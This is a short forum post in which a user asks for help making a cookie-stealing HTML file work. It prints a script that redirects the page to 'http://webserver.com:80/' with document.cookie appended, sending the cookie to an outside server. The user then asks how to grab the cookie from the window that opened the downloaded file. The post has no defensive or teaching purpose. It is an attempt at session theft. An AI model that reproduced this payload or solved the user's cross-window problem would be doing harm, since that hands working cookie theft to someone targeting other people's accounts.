i need some really big help im trying to log a cookie
the cookie is logged when .html file is downloaded then opened the problem is
the download is opened in another window so the cookie script isnt logging
<html>
<body>
<script>document.location='http://webserver.com:80/'+document.cookie</script>
</body>
</html>
"document.location"
its logging the cookie from the location which is a new window
so there isnt a cookie in the new window
how do i log the cookie of the other window it was opened from


Reply With Quote
Bookmarks